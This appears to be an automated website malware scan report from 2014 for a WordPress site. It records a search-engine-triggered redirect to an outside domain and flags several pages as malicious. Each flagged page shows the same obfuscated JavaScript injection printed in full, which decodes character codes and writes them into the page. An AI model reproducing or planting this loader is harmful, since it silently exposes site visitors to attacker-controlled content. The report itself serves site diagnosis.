Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://transformation-center-beta.org/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: transformation-center-beta.org Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 04 Sep 2014 08:38:22 GMT Location: http://ibontu.25u.com/ Server: Apache Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://transformation-center-beta.org/ | 200 OK Content-Length: 26118 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']); _ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']); _ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']); _ga4.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://transformation-center-beta.org/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://transformation-center-beta.org/wp-content/plugins/wp-imageflow2/js/imageflowplus.js?ver=3.5.1 | 200 OK Content-Length: 27459 Content-Type: application/javascript | clean |
http://transformation-center-beta.org/wp-content/themes/thetransformationcenter/js/comment-reply.js?ver=3.5.1 | 200 OK Content-Length: 909 Content-Type: application/javascript | clean |
http://transformation-center-beta.org/wp-content/plugins/slide-in/js/wdsi.js?ver=1.1.3 | 200 OK Content-Length: 12152 Content-Type: application/javascript | clean |
http://transformation-center-beta.org/wp-content/themes/thetransformationcenter/js/jquery.main.js | 200 OK Content-Length: 46164 Content-Type: application/javascript | clean |
http://transformation-center-beta.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ | 404 Not Found Content-Length: 11640 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']); _ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']); _ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']); _ga4.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://transformation-center-beta.org/about/ | 200 OK Content-Length: 16684 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']); _ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']); _ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']); _ga4.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://transformation-center-beta.org/contact/ | 200 OK Content-Length: 17536 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']); _ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']); _ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']); _ga4.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://transformation-center-beta.org/wp-content/plugins/easy-contact-forms/easy-contact-forms-forms.1.3.1.js?ver=3.5.1 | 200 OK Content-Length: 19714 Content-Type: application/javascript | clean |
http://transformation-center-beta.org/donate/ | 200 OK Content-Length: 13810 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']); _ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']); _ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']); _ga4.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://transformation-center-beta.org/?feed=rss2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 04 Sep 2014 08:38:32 GMT ETag: "0ceb3b013543d1312e748476a2725e75" Location: http://transformation-center-beta.org/feed/ Server: Apache Content-Length: 0 Content-Type: text/html Last-Modified: Thu, 13 Jun 2013 03:09:51 GMT Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=transformation-center-beta.org Set-Cookie: wdsi-on_hided41d8cd98f00b204e9800998ecf8427e=deleted; expires=Wed, 04-Sep-2013 08:38:32 GMT; path=/ X-Pingback: http://transformation-center-beta.org/xmlrpc.php | clean |
http://transformation-center-beta.org/feed/ | 200 OK Content-Length: 17897 Content-Type: text/xml | clean |
http://transformation-center-beta.org/wp-content/uploads/2012/10/vfc-Summer-2012.pdf | 200 OK Content-Length: 300869 Content-Type: application/pdf | clean |
http://transformation-center-beta.org/test404page.js | 404 Not Found Content-Length: 11640 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']); _ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']); _ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']); _ga4.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://transformation-center-beta.org/home/community/ | 200 OK Content-Length: 14852 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']); _ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']); _ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']); _ga4.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=transformation-center-beta.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://transformation-center-beta.org/
Result: transformation-center-beta.org is not infected or malware details are not published yet.
Result: transformation-center-beta.org is not infected or malware details are not published yet.